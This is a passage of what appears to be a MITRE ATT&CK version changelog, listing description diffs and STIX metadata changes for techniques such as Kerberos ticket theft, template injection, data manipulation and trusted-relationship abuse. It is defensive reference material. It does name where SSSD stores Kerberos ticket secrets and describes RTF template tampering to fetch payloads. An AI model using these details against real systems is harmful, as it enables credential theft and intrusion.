[Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access. On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist) Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
x_mitre_data_sources[0]File: File AccessLogon Session: Logon Session Metadata
x_mitre_data_sources[2]Active Directory: Active Directory Credential RequestFile: File Access
x_mitre_data_sources[3]Logon Session: Logon Session MetadataActive Directory: Active Directory Credential Request
x_mitre_version1.31.4

[T1565.001] Data Manipulation: Stored Data Manipulation

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may insert, delete, or manipulate data at rest it1Adversaries may insert, delete, or manipulate data at rest i
>n order to manipulate external outcomes or hide activity.(Ci>n order to influence external outcomes or hide activity, thu
>tation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2>s threatening the integrity of the data.(Citation: FireEye A
>018) By manipulating stored data, adversaries may attempt to>PT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulat
> affect a business process, organizational understanding, an>ing stored data, adversaries may attempt to affect a busines
>d decision making.  Stored data could include a variety of f>s process, organizational understanding, and decision making
>ile formats, such as Office files, databases, stored emails,>.  Stored data could include a variety of file formats, such
> and custom file formats. The type of modification and the i> as Office files, databases, stored emails, and custom file 
>mpact it will have depends on the type of data as well as th>formats. The type of modification and the impact it will hav
>e goals and objectives of the adversary. For complex systems>e depends on the type of data as well as the goals and objec
>, an adversary would likely need special expertise and possi>tives of the adversary. For complex systems, an adversary wo
>bly access to specialized software related to the system tha>uld likely need special expertise and possibly access to spe
>t would typically be gained through a prolonged information >cialized software related to the system that would typically
>gathering campaign in order to have the desired impact.> be gained through a prolonged information gathering campaig
 >n in order to have the desired impact.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'root', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2020-03-02 15:17:40.505000+00:002022-04-19 23:03:49.461000+00:00
descriptionAdversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
external_references[1]['source_name']FireEye APT38 Oct 2018DOJ Lazarus Sony 2018
external_references[1]['description']FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
external_references[1]['url']https://content.fireeye.com/apt/rpt-apt38https://www.justice.gov/opa/press-release/file/1092091/download
external_references[2]['source_name']DOJ Lazarus Sony 2018FireEye APT38 Oct 2018
external_references[2]['description']Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
external_references[2]['url']https://www.justice.gov/opa/press-release/file/1092091/downloadhttps://content.fireeye.com/apt/rpt-apt38
x_mitre_data_sources[0]File: File CreationFile: File Modification
x_mitre_data_sources[2]File: File ModificationFile: File Creation
x_mitre_version1.01.1

[T1569] System Services

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 18:40:23.888000+00:002022-03-22 17:29:46.189000+00:00
x_mitre_data_sources[0]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[1]Process: Process CreationCommand: Command Execution
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsLinux

[T1221] Template Injection

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may create or modify references in Office documet1Adversaries may create or modify references in user document
>nt templates to conceal malicious code or force authenticati> templates to conceal malicious code or force authentication
>on attempts. Microsoft’s Office Open XML (OOXML) specificati> attempts. For example, Microsoft’s Office Open XML (OOXML) 
>on defines an XML-based format for Office documents (.docx, >specification defines an XML-based format for Office documen
>xlsx, .pptx) to replace older binary formats (.doc, .xls, .p>ts (.docx, xlsx, .pptx) to replace older binary formats (.do
>pt). OOXML files are packed together ZIP archives compromise>c, .xls, .ppt). OOXML files are packed together ZIP archives
>d of various XML files, referred to as parts, containing pro> compromised of various XML files, referred to as parts, con
>perties that collectively define how a document is rendered.>taining properties that collectively define how a document i
> (Citation: Microsoft Open XML July 2017)  Properties within>s rendered.(Citation: Microsoft Open XML July 2017)  Propert
> parts may reference shared public resources accessed via on>ies within parts may reference shared public resources acces
>line URLs. For example, template properties reference a file>sed via online URLs. For example, template properties may re
>, serving as a pre-formatted document blueprint, that is fet>ference a file, serving as a pre-formatted document blueprin
>ched when the document is loaded.  Adversaries may abuse thi>t, that is fetched when the document is loaded.  Adversaries
>s technology to initially conceal malicious code to be execu> may abuse these templates to initially conceal malicious co
>ted via documents. Template references injected into a docum>de to be executed via user documents. Template references in
>ent may enable malicious payloads to be fetched and executed>jected into a document may enable malicious payloads to be f
> when the document is loaded. (Citation: SANS Brian Wiltse T>etched and executed when the document is loaded.(Citation: S
>emplate Injection) These documents can be delivered via othe>ANS Brian Wiltse Template Injection) These documents can be 
>r techniques such as [Phishing](https://attack.mitre.org/tec>delivered via other techniques such as [Phishing](https://at
>hniques/T1566) and/or [Taint Shared Content](https://attack.>tack.mitre.org/techniques/T1566) and/or [Taint Shared Conten
>mitre.org/techniques/T1080) and may evade static detections >t](https://attack.mitre.org/techniques/T1080) and may evade 
>since no typical indicators (VBA macro, script, etc.) are pr>static detections since no typical indicators (VBA macro, sc
>esent until after the malicious payload is fetched. (Citatio>ript, etc.) are present until after the malicious payload is
>n: Redxorblue Remote Template Injection) Examples have been > fetched.(Citation: Redxorblue Remote Template Injection) Ex
>seen in the wild where template injection was used to load m>amples have been seen in the wild where template injection w
>alicious code containing an exploit. (Citation: MalwareBytes>as used to load malicious code containing an exploit.(Citati
> Template Injection OCT 2017)  This technique may also enabl>on: MalwareBytes Template Injection OCT 2017)  Adversaries m
>e [Forced Authentication](https://attack.mitre.org/technique>ay also modify the <code>*\template</code> control word with
>s/T1187) by injecting a SMB/HTTPS (or other credential promp>in an .rtf file to similarly conceal then download malicious
>ting) URL and triggering an authentication attempt. (Citatio> code. This legitimate control word value is intended to be 
>n: Anomali Template Injection MAR 2018) (Citation: Talos Tem>a file destination of a template file resource that is retri
>plate Injection July 2017) (Citation: ryhanson phishery SEPT>eved and loaded when an .rtf file is opened. However, advers
> 2016)>aries may alter the bytes of an existing .rtf file to insert
 > a template control word field to include a URL resource of 
 >a malicious payload.(Citation: Proofpoint RTF Injection)(Cit
 >ation: Ciberseguridad Decoding malicious RTF files)  This te
 >chnique may also enable [Forced Authentication](https://atta
 >ck.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or 
 >other credential prompting) URL and triggering an authentica
 >tion attempt.(Citation: Anomali Template Injection MAR 2018)
 >(Citation: Talos Template Injection July 2017)(Citation: ryh
 >anson phishery SEPT 2016)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-04-29 14:37:59.462000+00:002022-01-12 18:16:56.176000+00:00
descriptionAdversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded. Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017) This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017) Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded. Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017) Adversaries may also modify the *\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files) This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)
external_references[5]['source_name']Anomali Template Injection MAR 2018Proofpoint RTF Injection
external_references[5]['description']Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors . Retrieved December 9, 2021.
external_references[5]['url']https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread
external_references[6]['source_name']Talos Template Injection July 2017Ciberseguridad Decoding malicious RTF files
external_references[6]['description']Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.
external_references[6]['url']https://blog.talosintelligence.com/2017/07/template-injection.htmlhttps://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/
external_references[7]['source_name']ryhanson phishery SEPT 2016Anomali Template Injection MAR 2018
external_references[7]['description']Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.
external_references[7]['url']https://github.com/ryhanson/phisheryhttps://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104
x_mitre_detectionAnalyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior. Monitor .rtf files for strings indicating the *\template control word has been modified to retrieve a URL resource, such as *\template http or *\template \u-.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Talos Template Injection July 2017', 'description': 'Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.', 'url': 'https://blog.talosintelligence.com/2017/07/template-injection.html'}
external_references{'source_name': 'ryhanson phishery SEPT 2016', 'description': 'Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.', 'url': 'https://github.com/ryhanson/phishery'}
x_mitre_contributorsMichael Raggi @aRtAGGI

[T1565.002] Data Manipulation: Transmitted Data Manipulation

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may alter data en route to storage or other systt1Adversaries may alter data en route to storage or other syst
>ems in order to manipulate external outcomes or hide activit>ems in order to manipulate external outcomes or hide activit
>y.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus S>y, thus threatening the integrity of the data.(Citation: Fir
>ony 2018) By manipulating transmitted data, adversaries may >eEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By man
>attempt to affect a business process, organizational underst>ipulating transmitted data, adversaries may attempt to affec
>anding, and decision making.  Manipulation may be possible o>t a business process, organizational understanding, and deci
>ver a network connection or between system processes where t>sion making.  Manipulation may be possible over a network co
>here is an opportunity deploy a tool that will intercept and>nnection or between system processes where there is an oppor
> change information. The type of modification and the impact>tunity deploy a tool that will intercept and change informat
> it will have depends on the target transmission mechanism a>ion. The type of modification and the impact it will have de
>s well as the goals and objectives of the adversary. For com>pends on the target transmission mechanism as well as the go
>plex systems, an adversary would likely need special experti>als and objectives of the adversary. For complex systems, an
>se and possibly access to specialized software related to th> adversary would likely need special expertise and possibly 
>e system that would typically be gained through a prolonged >access to specialized software related to the system that wo
>information gathering campaign in order to have the desired >uld typically be gained through a prolonged information gath
>impact.>ering campaign in order to have the desired impact.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM', 'root']
values_changed
STIX FieldOld valueNew Value
modified2020-03-02 15:20:28.455000+00:002022-04-19 23:04:44.258000+00:00
descriptionAdversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
external_references[1]['source_name']FireEye APT38 Oct 2018DOJ Lazarus Sony 2018
external_references[1]['description']FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
external_references[1]['url']https://content.fireeye.com/apt/rpt-apt38https://www.justice.gov/opa/press-release/file/1092091/download
external_references[2]['source_name']DOJ Lazarus Sony 2018FireEye APT38 Oct 2018
external_references[2]['description']Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
external_references[2]['url']https://www.justice.gov/opa/press-release/file/1092091/downloadhttps://content.fireeye.com/apt/rpt-apt38
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T1199] Trusted Relationship

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1Adversaries may breach or otherwise leverage organizations wt1Adversaries may breach or otherwise leverage organizations w
>ho have access to intended victims. Access through trusted t>ho have access to intended victims. Access through trusted t
>hird party relationship exploits an existing connection that>hird party relationship abuses an existing connection that m
> may not be protected or receives less scrutiny than standar>ay not be protected or receives less scrutiny than standard 
>d mechanisms of gaining access to a network.  Organizations >mechanisms of gaining access to a network.  Organizations of
>often grant elevated access to second or third-party externa>ten grant elevated access to second or third-party external 
>l providers in order to allow them to manage internal system>providers in order to allow them to manage internal systems 
>s as well as cloud-based environments. Some examples of thes>as well as cloud-based environments. Some examples of these 
>e relationships include IT services contractors, managed sec>relationships include IT services contractors, managed secur
>urity providers, infrastructure contractors (e.g. HVAC, elev>ity providers, infrastructure contractors (e.g. HVAC, elevat
>ators, physical security). The third-party provider's access>ors, physical security). The third-party provider's access m
> may be intended to be limited to the infrastructure being m>ay be intended to be limited to the infrastructure being mai
>aintained, but may exist on the same network as the rest of >ntained, but may exist on the same network as the rest of th
>the enterprise. As such, [Valid Accounts](https://attack.mit>e enterprise. As such, [Valid Accounts](https://attack.mitre
>re.org/techniques/T1078) used by the other party for access >.org/techniques/T1078) used by the other party for access to
>to internal network systems may be compromised and used.(Cit> internal network systems may be compromised and used.(Citat
>ation: CISA IT Service Providers)>ion: CISA IT Service Providers)  In Office 365 environments,
 > organizations may grant Microsoft partners or resellers del
 >egated administrator permissions. By compromising a partner 
 >or reseller account, an adversary may be able to leverage ex
 >isting delegated administrator relationships or send new del
 >egated administrator offers to clients in order to gain admi
 >nistrative control over the victim tenant.(Citation: Office 
 >365 Delegated Administration)

New Mitigations:

Dropped Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:01.045000+00:002022-10-21 14:35:00.274000+00:00
descriptionAdversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Logon Session: Logon Session CreationApplication Log: Application Log Content
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Office 365 Delegated Administration', 'description': 'Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.', 'url': 'https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us'}
x_mitre_contributorsExtraHop
x_mitre_contributorsJannie Li, Microsoft Threat Intelligence Center (MSTIC)
x_mitre_data_sourcesLogon Session: Logon Session Creation
x_mitre_platformsOffice 365

[T1608.002] Stage Capabilities: Upload Tool

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may upload tools to third-party or adversary cont1Adversaries may upload tools to third-party or adversary con
>trolled infrastructure to make it accessible during targetin>trolled infrastructure to make it accessible during targetin
>g. Tools can be open or closed source, free or commercial. T>g. Tools can be open or closed source, free or commercial. T
>ools can be used for malicious purposes by an adversary, but>ools can be used for malicious purposes by an adversary, but
> (unlike malware) were not intended to be used for those pur> (unlike malware) were not intended to be used for those pur
>poses (ex: [PsExec](https://attack.mitre.org/software/S0029)>poses (ex: [PsExec](https://attack.mitre.org/software/S0029)
>). Adversaries may upload tools to support their operations,>). Adversaries may upload tools to support their operations,
> such as making a tool available to a victim network to enab> such as making a tool available to a victim network to enab
>le [Ingress Tool Transfer](https://attack.mitre.org/techniqu>le [Ingress Tool Transfer](https://attack.mitre.org/techniqu
>es/T1105) by placing it on an Internet accessible web server>es/T1105) by placing it on an Internet accessible web server
>.  Tools may be placed on infrastructure that was previously>.  Tools may be placed on infrastructure that was previously
> purchased/rented by the adversary ([Acquire Infrastructure]> purchased/rented by the adversary ([Acquire Infrastructure]
>(https://attack.mitre.org/techniques/T1583)) or was otherwis>(https://attack.mitre.org/techniques/T1583)) or was otherwis
>e compromised by them ([Compromise Infrastructure](https://a>e compromised by them ([Compromise Infrastructure](https://a
>ttack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) >ttack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) 
>Tools can also be staged on web services, such as an adversa>Tools can also be staged on web services, such as an adversa
>ry controlled GitHub repo.  Adversaries can avoid the need t>ry controlled GitHub repo, or on Platform-as-a-Service offer
>o upload a tool by having compromised victim machines downlo>ings that enable users to easily provision applications.(Cit
>ad the tool directly from a third-party hosting location (ex>ation: Dragos Heroku Watering Hole)(Citation: Malwarebytes H
>: a non-adversary controlled GitHub repo), including the ori>eroku Skimmers)(Citation: Intezer App Service Phishing)  Adv
>ginal hosting site of the tool.>ersaries can avoid the need to upload a tool by having compr
 >omised victim machines download the tool directly from a thi
 >rd-party hosting location (ex: a non-adversary controlled Gi
 >tHub repo), including the original hosting site of the tool.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:25:37.072000+00:002022-10-20 20:16:32.599000+00:00
descriptionAdversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo. Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing) Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Malwarebytes Heroku Skimmers', 'description': "Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.", 'url': 'https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku'}
external_references{'source_name': 'Dragos Heroku Watering Hole', 'description': 'Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.', 'url': 'https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/'}
